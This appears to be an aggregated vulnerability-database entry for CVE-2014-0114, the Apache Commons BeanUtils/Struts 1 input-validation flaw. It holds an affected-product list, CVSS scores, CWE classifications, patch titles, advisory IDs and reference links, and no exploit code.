vendor:ibmmodel:security qradarscope:eqversion:7.2

Trust: 0.3

vendor:ibmmodel:rational insight ifix1scope:eqversion:1.0.1

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (solaris(spscope:eqversion:7.1.0-00

Trust: 0.3

vendor:ibmmodel:ds8870scope:eqversion:7.1

Trust: 0.3

vendor:hitachimodel:device manager software (linux(rhelscope:eqversion:8.0.0-00

Trust: 0.3

vendor:redhatmodel:jboss fusescope:eqversion:6.1.0

Trust: 0.3

vendor:ibmmodel:distributed marketingscope:eqversion:7.0

Trust: 0.3

vendor:ibmmodel:websphere partner gateway enterprise editionscope:eqversion:6.2

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.2.2

Trust: 0.3

vendor:ibmmodel:rational reporting for development intelligencescope:eqversion:2.0.3

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.5.53

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (solaris(spscope:eqversion:7.6.1-05

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:6.1.0.34

Trust: 0.3

vendor:ibmmodel:tivoli storage productivity centerscope:eqversion:4.1

Trust: 0.3

vendor:hitachimodel:global link manager software (linux(rhelscope:eqversion:8.0.0-00

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:7.4

Trust: 0.3

vendor:oraclemodel:utilities frameworkscope:eqversion:4.2.0.1.0

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(rhelscope:eqversion:8.0.0-05

Trust: 0.3

vendor:debianmodel:linux armscope:eqversion:6.0

Trust: 0.3

vendor:ibmmodel:ds8870scope:eqversion:7.2

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.5.4

Trust: 0.3

vendor:ibmmodel:distributed marketingscope:eqversion:8.5

Trust: 0.3

vendor:centosmodel:centosscope:eqversion:5

Trust: 0.3

vendor:ibmmodel:websphere enterprise service busscope:eqversion:7

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:7.001

Trust: 0.3

vendor:ibmmodel:tivoli storage productivity centerscope:eqversion:4.2.2143

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:7.0

Trust: 0.3

vendor:hpmodel:sitescopescope:eqversion:11.12

Trust: 0.3

vendor:hitachimodel:tuning manager software )scope:eqversion:6.402

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-50

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.2.1

Trust: 0.3

vendor:hpmodel:xp p9000 replication managerscope:eqversion:7.6.1-06

Trust: 0.3

vendor:ibmmodel:tivoli storage managerscope:eqversion:6.1

Trust: 0.3

vendor:hitachimodel:tuning manager software )scope:eqversion:6.0

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (solaris(x6scope:eqversion:7.6.1-05

Trust: 0.3

vendor:oraclemodel:real-time decision serverscope:eqversion:11.1.1.7

Trust: 0.3

vendor:ibmmodel:distributed marketingscope:eqversion:9.0

Trust: 0.3

vendor:oraclemodel:retail invoice matchingscope:eqversion:11.0

Trust: 0.3

vendor:hitachimodel:tuning manager software )scope:eqversion:6.1-00

Trust: 0.3

vendor:oraclemodel:retail invoice matchingscope:eqversion:14.0

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:6.1.0.37

Trust: 0.3

vendor:hitachimodel:tuning manager software (solaris(spscope:eqversion:7.6.1-05

Trust: 0.3

vendor:f5model:big-ip webaccelerator hf3scope:eqversion:11.2

Trust: 0.3

vendor:ibmmodel:openpagesscope:eqversion:6.1.0.1

Trust: 0.3

vendor:ibmmodel:tivoli dynamic workload consolescope:eqversion:8.4

Trust: 0.3

vendor:hitachimodel:device manager softwarescope:eqversion:7.1.0-00

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.1

Trust: 0.3

vendor:hpmodel:sitescopescope:eqversion:11.21

Trust: 0.3

vendor:oraclemodel:retail markdown optimizationscope:eqversion:13.4

Trust: 0.3

vendor:ibmmodel:leadsscope:eqversion:7.0

Trust: 0.3

vendor:ibmmodel:rational reporting for development intelligencescope:eqversion:2.0.6

Trust: 0.3

vendor:hpmodel:sitescopescope:neversion:11.24.271

Trust: 0.3

vendor:ibmmodel:lotus expeditorscope:eqversion:6.2.1

Trust: 0.3

vendor:hitachimodel:tiered storage manager software )scope:eqversion:7.0-00

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(susescope:eqversion:8.0.0-05

Trust: 0.3

vendor:ibmmodel:tivoli storage productivity centerscope:eqversion:5.1.1.1

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:8.0.0-00

Trust: 0.3

vendor:hitachimodel:tuning manager software )scope:eqversion:6.2-00

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:6.4.0-08

Trust: 0.3

vendor:oraclemodel:retail central officescope:eqversion:8.0

Trust: 0.3

vendor:ibmmodel:tivoli provisioning manager for softwarescope:eqversion:5.1

Trust: 0.3

vendor:hitachimodel:global link manager software (linux(susescope:eqversion:8.0.0-00

Trust: 0.3

vendor:oraclemodel:weblogic serverscope:eqversion:12.1.3

Trust: 0.3

vendor:redhatmodel:network satellite server (for rhelscope:eqversion:6)5.6

Trust: 0.3

vendor:ibmmodel:smart analytics systemscope:eqversion:56002

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (solaris(spscope:eqversion:6.4.0-08

Trust: 0.3

vendor:ibmmodel:content navigatorscope:eqversion:2.0.2

Trust: 0.3

vendor:ibmmodel:infosphere identity insightscope:eqversion:8.1

Trust: 0.3

vendor:oraclemodel:retail invoice matchingscope:eqversion:13.1

Trust: 0.3

vendor:hitachimodel:raplication manager software (linux(rhelscope:eqversion:7.6.1-05

Trust: 0.3

vendor:ibmmodel:smart analytics systemscope:eqversion:76000

Trust: 0.3

vendor:ibmmodel:tivoli netcool/omnibus web guiscope:eqversion:7.3

Trust: 0.3

vendor:hitachimodel:device manager software (linux(slesscope:eqversion:7.1.0-00

Trust: 0.3

vendor:oraclemodel:retail clearance optimization enginescope:eqversion:13.3

Trust: 0.3

vendor:oraclemodel:retail central officescope:eqversion:12.0

Trust: 0.3

vendor:ibmmodel:connectionsscope:eqversion:3.0.1

Trust: 0.3

vendor:f5model:arxscope:eqversion:6.1

Trust: 0.3

vendor:hitachimodel:device manager software (linux(rhelscope:eqversion:7.1.0-00

Trust: 0.3

vendor:junipermodel:security threat response manager 2012.1r7scope:neversion: -

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:10.2.4

Trust: 0.3

vendor:hitachimodel:global link manager software (linux(rhelscope:neversion:8.0.0-01

Trust: 0.3

vendor:junipermodel:security threat response managerscope:eqversion:2013.2

Trust: 0.3

vendor:hitachimodel:device manager software (linux(rhelscope:eqversion:7.0.1-02

Trust: 0.3

vendor:oraclemodel:retail invoice matchingscope:eqversion:13.0

Trust: 0.3

vendor:ntt datamodel:terasoluna server framework for javascope:eqversion:2.01

Trust: 0.3

vendor:oraclemodel:identity managerscope:eqversion:11.1.21.0

Trust: 0.3

vendor:ibmmodel:websphere portalscope:eqversion:7.0

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(rhelscope:eqversion:6.2.0-00

Trust: 0.3

vendor:hitachimodel:device manager softwarescope:eqversion:7.3.1

Trust: 0.3

vendor:ibmmodel:tivoli application dependency discovery managerscope:eqversion:7.2

Trust: 0.3

vendor:hitachimodel:tuning manager software (linux(rhelscope:eqversion:8.0.0-05

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(rhelscope:eqversion:7.0.0-00

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-0

Trust: 0.3

vendor:hitachimodel:device manager softwarescope:eqversion:7.4-00

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:9.1

Trust: 0.3

vendor:hpmodel:xp p9000 replication managerscope:eqversion:5.0.0-00

Trust: 0.3

vendor:ibmmodel:connectionsscope:eqversion:3.00

Trust: 0.3

vendor:hpmodel:sitescopescope:neversion:11.13

Trust: 0.3

vendor:oraclemodel:primavera p6 enterprise project portfolio managementscope:eqversion:16.2

Trust: 0.3

vendor:oraclemodel:fusion middlewarescope:eqversion:11.1.1.5.0

Trust: 0.3

vendor:hitachimodel:device manager software (solaris(spscope:eqversion:7.0.0-00

Trust: 0.3

vendor:ibmmodel:connectionsscope:eqversion:2.5.0.1

Trust: 0.3

vendor:oraclemodel:enterprise data qualityscope:eqversion:8.1.2

Trust: 0.3

vendor:ibmmodel:predictive insightscope:eqversion:9.1

Trust: 0.3

vendor:oraclemodel:jdeveloperscope:eqversion:12.1.20.0

Trust: 0.3

vendor:ibmmodel:infosphere information serverscope:eqversion:9.1.2.0

Trust: 0.3

vendor:oraclemodel:jdeveloperscope:eqversion:12.1.30

Trust: 0.3

vendor:oraclemodel:retail central officescope:eqversion:13.3

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.0

Trust: 0.3

vendor:oraclemodel:insurance ifrs analyzerscope:eqversion:178.0.6

Trust: 0.3

vendor:oraclemodel:fusion middlewarescope:eqversion:11.1.22.0

Trust: 0.3

vendor:oraclemodel:weblogic serverscope:eqversion:12.1.3.0

Trust: 0.3

vendor:ibmmodel:tivoli system automation application managerscope:eqversion:3.2.2

Trust: 0.3

vendor:oraclemodel:retail returns managementscope:eqversion:13.2

Trust: 0.3

vendor:hitachimodel:tuning manager software (solaris(spscope:eqversion:6.4.0-03

Trust: 0.3

vendor:ibmmodel:websphere service registry and repositoryscope:eqversion:7.5

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-50-09

Trust: 0.3

vendor:ibmmodel:smart analytics systemscope:eqversion:10500

Trust: 0.3

vendor:hitachimodel:device manager softwarescope:eqversion:6.4.0-08

Trust: 0.3

vendor:hitachimodel:tuning manager software )scope:eqversion:7.0

Trust: 0.3

vendor:oraclemodel:retail allocationscope:eqversion:12.0

Trust: 0.3

vendor:oraclemodel:retail central office 12.0.9inscope: - version: -

Trust: 0.3

vendor:oraclemodel:utilities frameworkscope:eqversion:4.1.0.2.0

Trust: 0.3

vendor:ibmmodel:smart analytics systemscope:eqversion:77000

Trust: 0.3

vendor:oraclemodel:communications webrtc session controllerscope:eqversion:7.1

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:7.1

Trust: 0.3

vendor:hitachimodel:global link manager software (solaris(spscope:eqversion:7.6.1-01

Trust: 0.3

vendor:ibmmodel:websphere partner gateway express editionscope:eqversion:6.0

Trust: 0.3

vendor:hitachimodel:global link manager software (linux(susescope:neversion:8.0.0-01

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-10

Trust: 0.3

vendor:redhatmodel:enterprise linux serverscope:eqversion:5

Trust: 0.3

vendor:hitachimodel:tuning manager softwarescope:eqversion:6.0.0

Trust: 0.3

vendor:ibmmodel:tivoli storage productivity centerscope:eqversion:4.2.2.145

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.010

Trust: 0.3

vendor:hitachimodel:raplication manager software (linux(rhelscope:neversion:8.0.0-06

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:7.5.1

Trust: 0.3

vendor:oraclemodel:weblogic serverscope:eqversion:10.0.2

Trust: 0.3

vendor:hitachimodel:raplication manager software (solaris(spscope:eqversion:7.6.1-05

Trust: 0.3

vendor:hitachimodel:device manager software (linux(slesscope:eqversion:6.4.0-08

Trust: 0.3

vendor:ibmmodel:tivoli storage productivity centerscope:eqversion:5.1.13

Trust: 0.3

vendor:debianmodel:linux ia-32scope:eqversion:6.0

Trust: 0.3

vendor:oraclemodel:retail central officescope:eqversion:13.1

Trust: 0.3

vendor:oraclemodel:communications webrtc session controllerscope:eqversion:7.2

Trust: 0.3

vendor:hitachimodel:device manager software (linux(rhelscope:eqversion:6.4.0-08

Trust: 0.3

vendor:oraclemodel:retail markdown optimizationscope:eqversion:13.2

Trust: 0.3

vendor:ibmmodel:business process manager advancedscope:eqversion:7.5.1.1

Trust: 0.3

vendor:ibmmodel:infosphere mashuphubscope:eqversion:3.0

Trust: 0.3

vendor:vmwaremodel:vcenter server updatescope:neversion:5.52

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:7.2

Trust: 0.3

vendor:ibmmodel:tivoli provisioning managerscope:eqversion:7.1

Trust: 0.3

vendor:ibmmodel:websphere application serverscope:eqversion:7.021

Trust: 0.3

vendor:ibmmodel:tivoli application dependency discovery managerscope:eqversion:7.2.1

Trust: 0.3

vendor:hpmodel:device managerscope:eqversion:7.6.1-06

Trust: 0.3

vendor:oraclemodel:retail allocationscope:eqversion:11.0

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:8.6

Trust: 0.3

vendor:ibmmodel:campaignscope:eqversion:9.0

Trust: 0.3

vendor:ibmmodel:contact optimizationscope:eqversion:9.1

Trust: 0.3

vendor:hitachimodel:tiered storage manager softwarescope:eqversion:7.0.1-02

Trust: 0.3

vendor:hitachimodel:device manager software (solarisscope:eqversion:6.1.1-00(x64))

Trust: 0.3

vendor:ibmmodel:rational reporting for development intelligencescope:eqversion:2.0.1

Trust: 0.3

vendor:redhatmodel:enterprise linux desktop workstation clientscope:eqversion:5

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-08-00

Trust: 0.3

vendor:susemodel:managerscope:eqversion:111.7

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-09-00-01

Trust: 0.3

vendor:ibmmodel:websphere enterprise service busscope:eqversion:7.5

Trust: 0.3

vendor:hitachimodel:tuning manager software (solaris(spscope:eqversion:7.4.0-02

Trust: 0.3

vendor:debianmodel:linux powerpcscope:eqversion:6.0

Trust: 0.3

vendor:hitachimodel:global link manager softwarescope:eqversion:7.6.1-01

Trust: 0.3

vendor:hitachimodel:device manager softwarescope:eqversion:7.2.1-00

Trust: 0.3

vendor:f5model:big-ip edge gateway hf7scope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:10.2.1

Trust: 0.3

vendor:hitachimodel:device manager software (linux(slesscope:eqversion:6.3.0-00

Trust: 0.3

vendor:ibmmodel:tivoli provisioning managerscope:eqversion:7.2

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.3

Trust: 0.3

vendor:hitachimodel:device manager software (solarisscope:eqversion:6.2-00(x64))

Trust: 0.3

vendor:f5model:big-ip edge gateway hf3scope:eqversion:11.2.1

Trust: 0.3

vendor:ibmmodel:web interface for content managementscope:eqversion:1.0.4

Trust: 0.3

vendor:hitachimodel:device manager software )scope:eqversion:6.1-03

Trust: 0.3

vendor:oraclemodel:weblogic serverscope:eqversion:12.1.20

Trust: 0.3

vendor:hitachimodel:tuning manager software (solaris(spscope:eqversion:7.4.0-01

Trust: 0.3

vendor:oraclemodel:weblogic serverscope:eqversion:10.3.60

Trust: 0.3

vendor:ibmmodel:lotus quickr for websphere portalscope:eqversion:8.5

Trust: 0.3

vendor:ibmmodel:business process manager expressscope:eqversion:8.0.0

Trust: 0.3

vendor:hitachimodel:jp1/performance management web consolescope:eqversion:-09-00-02

Trust: 0.3

vendor:oraclemodel:retail allocationscope:eqversion:13.1

Trust: 0.3

vendor:hitachimodel:tiered storage manager software (linux(rhelscope:eqversion:6.4.0-07

Trust: 0.3

vendor:ibmmodel:rational application developerscope:eqversion:8.0.4

Trust: 0.3

vendor:ibmmodel:tivoli integrated portalscope:eqversion:2.1

Trust: 0.3

vendor:ibmmodel:contact optimizationscope:eqversion:7.0

Trust: 0.3

sources: BID: 67121 // JVNDB: JVNDB-2020-006468 // JVNDB: JVNDB-2014-002308 // CNNVD: CNNVD-201404-581 // NVD: CVE-2014-0114

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2014-0114
value: HIGH

Trust: 1.0

IPA: JVNDB-2020-006468
value: CRITICAL

Trust: 0.8

NVD: CVE-2014-0114
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201404-581
value: HIGH

Trust: 0.6

VULMON: CVE-2014-0114
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2014-0114
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

IPA: JVNDB-2020-006468
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: VULMON: CVE-2014-0114 // JVNDB: JVNDB-2020-006468 // JVNDB: JVNDB-2014-002308 // CNNVD: CNNVD-201404-581 // NVD: CVE-2014-0114

PROBLEMTYPE DATA

problemtype:CWE-20

Trust: 1.0

problemtype:Use of unmaintained third-party components (CWE-1104) [IPA Evaluation ]

Trust: 0.8

problemtype: Path traversal (CWE-22) [IPA Evaluation ]

Trust: 0.8

problemtype: Execution with unnecessary privileges (CWE-250) [IPA Evaluation ]

Trust: 0.8

problemtype: Inappropriate authorization (CWE-285) [IPA Evaluation ]

Trust: 0.8

problemtype: Improper authentication (CWE-287) [IPA Evaluation ]

Trust: 0.8

problemtype: Authentication bypass using alternate path or channel (CWE-288) [IPA Evaluation ]

Trust: 0.8

problemtype: Inappropriate restriction of excessive authentication attempts (CWE-307) [IPA Evaluation ]

Trust: 0.8

problemtype: Unlimited upload of dangerous types of files (CWE-434) [IPA Evaluation ]

Trust: 0.8

problemtype: Inadequate protection of credentials (CWE-522) [IPA Evaluation ]

Trust: 0.8

problemtype: Cross-site scripting (CWE-79) [IPA Evaluation ]

Trust: 0.8

problemtype: Lack of certification (CWE-862) [IPA Evaluation ]

Trust: 0.8

problemtype: Private features (CWE-912) [IPA Evaluation ]

Trust: 0.8

problemtype:Incorrect input confirmation (CWE-20) [NVD Evaluation ]

Trust: 0.8

sources: JVNDB: JVNDB-2020-006468 // JVNDB: JVNDB-2014-002308 // NVD: CVE-2014-0114

THREAT TYPE

remote

Trust: 0.9

sources: PACKETSTORM: 126619 // PACKETSTORM: 149050 // PACKETSTORM: 137980 // CNNVD: CNNVD-201404-581

TYPE

input validation error

Trust: 0.6

sources: CNNVD: CNNVD-201404-581

EXPLOIT AVAILABILITY

sources: VULMON: CVE-2014-0114

PATCH

title:OpenClinic GAurl:https://sourceforge.net/projects/open-clinic/

Trust: 0.8

title:Interstage Navigator Explorer Serverurl:https://issues.apache.org/jira/browse/BEANUTILS-463

Trust: 0.8

title:struts-1.2.9-4jpp.8.el5_10.srcurl:http://123.124.177.30/web/xxk/bdxqById.tag?id=49743

Trust: 0.6

title:Red Hat: Important: Red Hat A-MQ Broker 7.5 release and security updateurl:https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20192995 - Security Advisory

Trust: 0.1

title:Debian CVElist Bug Report Logs: libstruts1.2-java: CVE-2014-0114url:https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=96f4091aa31a0ece729fdcb110066df5

Trust: 0.1

title:Red Hat: CVE-2014-0114url:https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database&qid=CVE-2014-0114

Trust: 0.1

title:Red Hat: Important: Fuse 7.1 security updateurl:https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20182669 - Security Advisory

Trust: 0.1

title:IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been fixed in IBM Security Privileged Identity Manager Appliance.url:https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=f5bb2b180c7c77e5a02747a1f31830d9

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - January 2019url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=f655264a6935505d167bbf45f409a57b

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - October 2018url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=81c63752a6f26433af2128b2e8c02385

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - January 2018url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=e2a7f287e9acc8c64ab3df71130bc64d

Trust: 0.1

title:IBM: IBM Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilitiesurl:https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=55ea315dfb69fce8383762ac64250315

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - April 2017url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=143b3fb255063c81571469eaa3cf0a87

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - October 2017url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=523d3f220a64ff01dd95e064bd37566a

Trust: 0.1

title:IBM: Security Bulletin: Netcool Operations Insight v1.6.6 contains fixes for multiple security vulnerabilities.url:https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=68c6989b84f14aaac220c13b754c7702

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - January 2015url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=4a692d6d60aa31507cb101702b494c51

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - October 2016url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=05aabe19d38058b7814ef5514aab4c0c

Trust: 0.1

title:Oracle: Oracle Critical Patch Update Advisory - July 2018url:https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=5f8c525f1408011628af1792207b2099

Trust: 0.1

title:struts1-patchurl:https://github.com/ricedu/struts1-patch

Trust: 0.1

title: - url:https://github.com/weblegacy/struts1

Trust: 0.1

title:struts1filterurl:https://github.com/rgielen/struts1filter

Trust: 0.1

title:StrutsExampleurl:https://github.com/vikasvns2000/StrutsExample

Trust: 0.1

title:struts-miniurl:https://github.com/bingcai/struts-mini

Trust: 0.1

title:strutt-cve-2014-0114url:https://github.com/anob3it/strutt-cve-2014-0114

Trust: 0.1

title:super-pomurl:https://github.com/ian4hu/super-pom

Trust: 0.1

sources: VULMON: CVE-2014-0114 // JVNDB: JVNDB-2020-006468 // JVNDB: JVNDB-2014-002308 // CNNVD: CNNVD-201404-581

EXTERNAL IDS

db:NVDid:CVE-2014-0114

Trust: 4.4

db:ICS CERTid:ICSMA-20-184-01

Trust: 2.2

db:BIDid:67121

Trust: 1.9

db:SECUNIAid:59118

Trust: 1.6

db:SECUNIAid:59480

Trust: 1.6

db:SECUNIAid:59246

Trust: 1.6

db:SECUNIAid:60177

Trust: 1.6

db:SECUNIAid:59479

Trust: 1.6

db:SECUNIAid:58710

Trust: 1.6

db:SECUNIAid:59718

Trust: 1.6

db:SECUNIAid:59430

Trust: 1.6

db:SECUNIAid:59464

Trust: 1.6

db:SECUNIAid:58851

Trust: 1.6

db:SECUNIAid:59228

Trust: 1.6

db:SECUNIAid:59704

Trust: 1.6

db:SECUNIAid:59014

Trust: 1.6

db:SECUNIAid:57477

Trust: 1.6

db:SECUNIAid:59245

Trust: 1.6

db:SECUNIAid:58947

Trust: 1.6

db:SECUNIAid:60703

Trust: 1.6

db:OPENWALLid:OSS-SECURITY/2014/07/08/1

Trust: 1.6

db:OPENWALLid:OSS-SECURITY/2014/06/15/10

Trust: 1.6

db:HITACHIid:HS14-018

Trust: 0.9

db:HITACHIid:HS14-020

Trust: 0.9

db:JUNIPERid:JSA10643

Trust: 0.9

db:JVNid:JVN30962312

Trust: 0.9

db:JVNid:JVNVU96290700

Trust: 0.8

db:JVNDBid:JVNDB-2020-006468

Trust: 0.8

db:JVNDBid:JVNDB-2014-000056

Trust: 0.8

db:JVNDBid:JVNDB-2014-002308

Trust: 0.8

db:CS-HELPid:SB2022072128

Trust: 0.6

db:AUSCERTid:ESB-2020.1427

Trust: 0.6

db:AUSCERTid:ESB-2019.1089

Trust: 0.6

db:AUSCERTid:ESB-2019.3134

Trust: 0.6

db:AUSCERTid:ESB-2019.2355

Trust: 0.6

db:AUSCERTid:ESB-2019.0544

Trust: 0.6

db:AUSCERTid:ESB-2019.2568

Trust: 0.6

db:AUSCERTid:ESB-2020.2293.2

Trust: 0.6

db:CNNVDid:CNNVD-201404-581

Trust: 0.6

db:VULMONid:CVE-2014-0114

Trust: 0.1

db:PACKETSTORMid:126619

Trust: 0.1

db:PACKETSTORMid:149050

Trust: 0.1

db:PACKETSTORMid:137980

Trust: 0.1

db:PACKETSTORMid:154792

Trust: 0.1

db:PACKETSTORMid:128873

Trust: 0.1

db:PACKETSTORMid:139721

Trust: 0.1

db:PACKETSTORMid:128211

Trust: 0.1

db:PACKETSTORMid:126811

Trust: 0.1

sources: VULMON: CVE-2014-0114 // BID: 67121 // PACKETSTORM: 126619 // PACKETSTORM: 149050 // PACKETSTORM: 137980 // PACKETSTORM: 154792 // PACKETSTORM: 128873 // PACKETSTORM: 139721 // PACKETSTORM: 128211 // PACKETSTORM: 126811 // JVNDB: JVNDB-2020-006468 // JVNDB: JVNDB-2014-002308 // CNNVD: CNNVD-201404-581 // NVD: CVE-2014-0114

REFERENCES

url:http://www.securityfocus.com/bid/67121

Trust: 2.8

url:http://www.vmware.com/security/advisories/vmsa-2014-0008.html

Trust: 2.5

url:http://www.vmware.com/security/advisories/vmsa-2014-0012.html

Trust: 2.2

url:http://www.debian.org/security/2014/dsa-2940

Trust: 2.2

url:http://www.ibm.com/support/docview.wss?uid=swg21675496

Trust: 2.2

url:http://www-01.ibm.com/support/docview.wss?uid=swg27042296

Trust: 1.9

url:http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html

Trust: 1.9

url:https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html

Trust: 1.9

url:http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html

Trust: 1.9

url:http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html

Trust: 1.9

url:https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html

Trust: 1.9

url:http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html

Trust: 1.9

url:http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

Trust: 1.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21676303

Trust: 1.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21675266

Trust: 1.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21676110

Trust: 1.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21677110

Trust: 1.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21675689

Trust: 1.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21674812

Trust: 1.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21674128

Trust: 1.9

url:http://www-01.ibm.com/support/docview.wss?uid=swg21675972

Trust: 1.9

url:https://security.gentoo.org/glsa/201607-09

Trust: 1.7

url:https://access.redhat.com/errata/rhsa-2019:2995

Trust: 1.7

url:https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3cannounce.apache.org%3e

Trust: 1.6

url:http://openwall.com/lists/oss-security/2014/06/15/10

Trust: 1.6

url:https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3ccommits.commons.apache.org%3e

Trust: 1.6

url:https://issues.apache.org/jira/browse/beanutils-463

Trust: 1.6

url:http://secunia.com/advisories/57477

Trust: 1.6

url:http://www-01.ibm.com/support/docview.wss?uid=swg21675898

Trust: 1.6

url:http://openwall.com/lists/oss-security/2014/07/08/1

Trust: 1.6

url:https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3cdev.commons.apache.org%3e

Trust: 1.6

url:https://security.netapp.com/advisory/ntap-20140911-0001/

Trust: 1.6

url:https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3ccommits.commons.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3cissues.commons.apache.org%3e

Trust: 1.6

url:http://secunia.com/advisories/59430

Trust: 1.6

url:http://seclists.org/fulldisclosure/2014/dec/23

Trust: 1.6

url:http://secunia.com/advisories/58851

Trust: 1.6

url:http://advisories.mageia.org/mgasa-2014-0219.html

Trust: 1.6

url:https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3cnotifications.commons.apache.org%3e

Trust: 1.6

url:http://secunia.com/advisories/59704

Trust: 1.6

url:https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3cissues.activemq.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3cgitbox.activemq.apache.org%3e

Trust: 1.6

url:https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3cdev.drill.apache.org%3e

Trust: 1.6

